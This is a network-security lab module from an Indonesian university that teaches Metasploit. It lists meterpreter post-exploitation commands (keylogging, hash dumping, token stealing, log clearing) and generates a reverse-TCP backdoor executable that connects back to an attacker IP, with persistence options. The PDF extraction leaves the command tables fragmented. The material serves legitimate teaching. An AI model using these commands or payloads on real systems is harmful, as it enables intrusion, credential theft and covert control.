Keamanan Jaringan
Network Security
Telkom University
2014-2015
Tujuan
1. Praktikan Mengenal dan memahami konsep dasar eksploitasi dengan metasploit
2. Praktikan dapat melakukan eksploitasi sederhana menggunakan metasploit
3. Praktikan Mengenal dan Memahami konsep dasar backdoor
4. Praktikan dapat melakukan instalasi sederhana backdoor menggunakan metasploit
II.
Modul Praktek
Keamanan Jaringan
Network Security
Telkom University
2014-2015
Libraries
Rex
Perpustakaan (libraries) dasar untuk sebagian besar tugas.
Menangani soket, protokol, transformasi teks, dll.
MSF Core
Menyediakan dasar API (Application Programming Interface)
Mendefinisikan metasploit framework
MSF Base
Menyediakan ramah API
Menyediakan API yang disederhanakan untuk framework
Metasploit Interface
1. MSFConsole
Pada praktikum ini menggunakan MSFconsole sebagai pembelajaran metasploit. Pada
msfconsole merupakan "all-in-one" atau konsol terpusat dan memungkinkan pengguna lebih
efisien karena untuk hampir semua pilihan telah tersedia di Metasploit Framework.
Modul Praktek
Keamanan Jaringan
Network Security
Telkom University
2014-2015
Kelebihan MSFConsole :
Merupakan interface satu-satunya yang dapat mengakses sebagian fitur yang ada pada
metasploit
Merupakan interface yang memiliki banyak fitur dan merupakan yang paling stabil
2. MSFcli
Merupakan interface yang menggunakan command line untuk menggunakan metasploit.
Kelebihan MSFcli :
Baik untuk pembelajaran, karena tidak menggunakan fitur otomatis seperti yang
dimiliki msfconsole
Modul Praktek
Keamanan Jaringan
Network Security
Telkom University
2014-2015
Kekurangan MSFcli :
MSFcli tidak mendukung banyak fitur sebaik MSFconsole, dan hanya dapat menangani satu
shell dalam satu waktu, sehingga lebih praktis untuk menggunakan serangan client-side.
Contoh :
3. Armitage
Armitage adalah salah satu interfaces yang dimiliki metasploit menggunakan grafis. Dibuat
oleh Raphael Mudge.
Armitage (Fili, 2010)
Modul Praktek
Keamanan Jaringan
Network Security
Telkom University
2014-2015
Modules
Dalam konteks ini, yang dimaksud modul adalah software yang digunakan oleh framework
metasploit.
Payload
Kode yang digunakan untuk mengeksekusi perintah pada sistem, kemudian kode ini dipilih
dan disampaikan oleh framework untuk melakukan penetrasi.
Shellcode
Shellcode adalah satu set instruksi yang digunakan sebagai payload ketika eksploitasi
terjadi. Shellcode biasanya ditulis dalam bahasa assembly.
Exploit
Pemanfaatan yang dilakukan oleh penyerang terhadap lemahnya suatu sistem untuk
memperoleh keuntungan.
Listener
Listener dalam konteks ini adalah komponen pada metasploit yang menunggu koneksi
masuk.
Encoders
Memastikan bahwa payload sampai ke tujuan
Auxiliary
Sebagai pelengkap modul
Meterpreter adalah salah satu produk unggulan yang dimiliki metasploit dan digunakan sebagai
payload setelah kerentanan sistem berhasil dimanfaatkan.
Meterpreter merupakan perpanjangan dari framework Metasploit yang memungkinkan kita untuk
memanfaatkan fungsi Metasploit. Beberapa fungsi ini meliputi cara untuk menutupi jejak, berada
sepenuhnya dalam memori, hash dump, akses sistem operasi, dan lain-lain.
Modul Praktek
Keamanan Jaringan
Network Security
Telkom University
2014-2015
Perintah Dasar
a. Perintah dasar MSFconsole
COMMAND
Artinya
show exploits
show payloads
show auxiliary
search <name>
info
use <name>
LHOST
RHOST
LPORT
RPORT
set function
setg function
Mengatur
nilai
tertentu
secara
global
show target
Modul Praktek
Keamanan Jaringan
Network Security
Telkom University
2014-2015
Show advanced
check
exploit
exploit -j
exploit -z
Menjalankan
modul
atau
mengeksploitasi
Menjalankan
modul
atau
mengekploitasi
Menampilkan
perintah
bantuan
untuk
session l v
session s script
session -K
session c cmd
Modul Praktek
Keamanan Jaringan
session u sessionID
Upgrade
Network Security
Telkom University
2014-2015
win32
shell normal ke
konsol
meterpreter
db_create
database
(contoh
db_create
autopwn)
db_connect
db_nmap
Menggunakan
nmap
dan
menempatkan
Tampilan
bantuan
untuk
menggunakan
db_autopwn
db_destroy
db_destroy
Menghapus
database
menggunakan
opsi
user:password@host:port/database lanjutan
Artinya
Menampilkan
perintah
bantuan
untuk
menjalankan meterpreter
run scriptname
sysinfo
ls
use priv
menggunakan
privilege
mode
untuk
Migrate PID
Modul Praktek
Keamanan Jaringan
Use incognito
Network Security
Telkom University
2014-2015
list_token -u
List_token -g
impersonate_token
DOMAIN_NAME\\USERNAME
steal_token PID
drop_token
getsystem
shell
execute -f cmd.exe -i
execute -f cmd.exe -i -t
execute -f cmd.exe -i -H -t
tersedia
dan
membuat
proses
tersembunyi
rev2self
reg command
setdesktop number
Modul Praktek
Keamanan Jaringan
Network Security
Telkom University
2014-2015
screenshot
upload file
download file
keyscan_start
keyscan_dump
keyscan_stop
getprivs
background
hashdump
use sniffer
sniffer_interfaces
sniffer_dump interfaceID
pcapname
sniffer_start interfaceID
packet-buffer
buffer paket.
sniffer_stats interfaceID
sniffer_stop interfaceID
Hentikan sniffer
ip
add_group_user "Domain Admins"
username -h ip
clearev
timestomp
reboot
Modul Praktek
Keamanan Jaringan
Network Security
Telkom University
2014-2015
REQUIREMENT METASPLOIT
Untuk spesifikasi hardware minimal dapat dilihat di http://www.offensive-security.com/metasploitunleashed/Requirements
INSTALASI METASPLOIT PADA UBUNTU 12.04
1. Update repository
#sudo apt-get update
2. Dapatkan package metasploit di http://metasploit.com/download
Keterangan : pada modul ini metasploit yang digunakan adalah untuk linux 32 bit
3. Simpan file tersebut di Desktop
4. Masuk mode bash
#sudo bash
5. Masuk direktori desktop
#cd Desktop/
6. Merubah hak akses
#chmod +x metasploit-latest-linux-installer.run
7. Lalu jalankan setup metasploit
#./ metasploit-latest-linux-installer.run
8. Klik forward
11
Modul Praktek
Keamanan Jaringan
Network Security
Telkom University
2014-2015
12
Modul Praktek
Keamanan Jaringan
Network Security
Telkom University
2014-2015
11. Klik yes, pada pilihan install as service lalu klik forward
13
Modul Praktek
Keamanan Jaringan
Network Security
Telkom University
2014-2015
14
Modul Praktek
Keamanan Jaringan
Network Security
Telkom University
2014-2015
B. Backdoor
Backdoor adalah salah satu jenis trojan yang sering digunakan untuk mengontrol suatu komputer
dari jarak jauh melalui jaringan baik lokal maupun Internet. Ciri khas backdoor adalah berjalan
secara tersembunyi, tidak menampilkan hal-hal yang mencurigakan, serta membuka port agar
komputer dapat diakses secara remote. Backdoor dapat juga disebut sebagai Remote Access Trojan
atau Remote Administration Tool (RAT).
Contoh trojan backdoor (RAT) adalah Posion Ivy, Bifrost, Optix Pro, DarkComet-Rat, XpertRAT, Back
Orifice, Sub Seven (Sub7), meterpreter backdoor, persistent backdoor (Netcat backdoor,
meterpreter service), dan lain-lain.
Cara kerja Trojan Backdoor
Ada dua bagian backdoor, yaitu client dan server. Client adalah program yang diinstal di komputer
target sedangkan server merupakan program yang digunakan attacker dalam mengoperasikan
komputer target. Ada dua metode komunikasi antara client dan server yaitu direct connection dan
reverse connection.
Pada direct connection, server berusaha melakukan koneksi ke IP target agar dapat
berkomunikasi dengan client. Tapi hal ini lebih mudah diblok oleh program firewall.
Pada reverse connection tidak membutuhkan IP target karena serverlah yang berusaha
melakukan koneksi ke IP client (attacker). Ketika attacker menjalankan client dengan koneksi
Internet lain, IP pun akan berubah, lalu bagaimana membuat IP client yang bersifat taktis?
Untuk mengatasi hal ini, attacker dapat memakai dynamic DNS yang banyak disediakan secara
gratis oleh website-website tertentu.
(Mojokertocyber Media, 2013)
15
Modul Praktek
Keamanan Jaringan
Network Security
Telkom University
2014-2015
Help banner
List available payloads
Untuk melihat daftar payload yang tersedia menggunakan perintah seperti dibawah ini :
root@praktikum:~# msfpayload -l
Framework Payloads (251 total)
==============================
Name
Description
-------------aix/ppc/shell_bind_tcp
Listen for a
connection and spawn a command shell
aix/ppc/shell_find_port
Spawn a shell on an
established connection
...snip...
...snip...
windows/x64/vncinject/bind_tcp
Listen for a
connection (Windows x64), Inject a VNC Dll via a reflective loader
(Windows x64) (staged)
windows/x64/vncinject/reverse_tcp
Connect back to the
attacker (Windows x64), Inject a VNC Dll via a reflective loader (Windows
x64) (staged)
16
Modul Praktek
Keamanan Jaringan
Network Security
Telkom University
2014-2015
Untuk mengecek apakah payload anda pilih tersebut tersedia pada komputer anda
root@praktikum:~# msfpayload windows/meterpreter/reverse_tcp O
Name: Windows Meterpreter (Reflective Injection), Reverse TCP Stager
Module: payload/windows/meterpreter/reverse_tcp
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 290
Rank: Normal
Provided by:
skape <mmiller@hick.org>
sf <stephen_fewer@harmonysecurity.com>
hdm <hdm@metasploit.com>
Basic options:
Name
Current Setting
-----------------EXITFUNC process
process, none
LHOST
LPORT
4444
Required
-------yes
Description
----------Exit technique: seh, thread,
yes
yes
Description:
Connect back to the attacker, Inject the meterpreter server DLL via
the Reflective Dll Injection payload (staged)
Status yes pada baris EXITFUNC menunjukan bahwa payload tersedia (sesuai)
17
Modul Praktek
Keamanan Jaringan
Network Security
Telkom University
2014-2015
Required
-------yes
Description
----------Exit technique: seh, thread,
yes
yes
Description:
Connect back to the attacker, Inject the meterpreter server DLL via
the Reflective Dll Injection payload (staged)
Status yes menunjukan bahwa pengaturan LHOST dan LPORT tersedia (sesuai)
Setelah memastikan bahwa semua pengaturan tersedia, maka eksekusi perintah tersebut seperti
contoh dibawah ini
root@praktikum:~# msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.2 LPORT=666 x > /var/www/backdoor.exe
Keterangan :
-
18
Modul Praktek
Keamanan Jaringan
Network Security
Telkom University
2014-2015
LHOST adalah Alamat IP local yang dijangkau oleh target / IP local yang digunakan oleh
pengguna metasploit, 192.168.1.2 adalah ip address yang digunakan oleh komputer
penyerang
LPORT Port local yang digunakan untuk membuka koneksi
x adalah argument yang menyatakan untuk dieksekusi (executable)
/var/www/ adalah tempat dimana file backdoor.exe disimpan
backdoor.exe adalah nama file .exe
Untuk melihat pilihan yang tersedia, kita dapat menggunakan perintah -h, perintah ini digunakan
setelah berhasil melakukan exploitasi menggunakan meterpreter.
meterpreter > run persistence -h
OPTIONS:
-A
Automatically start a matching multi/handler to connect to
the agent
-U
Automatically start the agent when the User logs on
-X
Automatically start the agent when the system boots
-h
This help menu
-i
The interval in seconds between each connection attempt
-p
The port on the remote host where Metasploit is listening
-r
The IP of the system running Metasploit listening for the
connect back
19
Modul Praktek
Keamanan Jaringan
IV.
Network Security
Telkom University
2014-2015
Referensi
Aharoni, M., Coppola, W., Hand, P., Hernandez, A., Kearns, D., Kennedy, D., et al. (2014). Metasploit
Unleashed. Retrieved Februari 12, 2014, from Offensive Secutity: http://www.offensivesecurity.com/metasploit-unleashed/Metasploit_Architecture
Fili. (2010, September 18). Eclectic Security. Retrieved April 03, 2014, from Metasploit 3.7.0 and
Armitage with postgresql support: http://bailey.st/blog/tag/metasploit/
Mojokertocyber Media. (2013). Hacking Dengan Trojan Backdoor. Retrieved April 8, 2014, from
Mojokertocyber Media: http://www.mojokertocyber.com/cyber-tech/keamananjaringan/178-hacking-dengan-trojan-backdoor.html
TechTarget. (2011, Agustus). Metasploit Project - Metasploit Framework. Retrieved Februari 12,
2014, from SearchSecurity.in: http://searchsecurity.techtarget.in/definition/MetasploitProject-Metasploit-Framework
20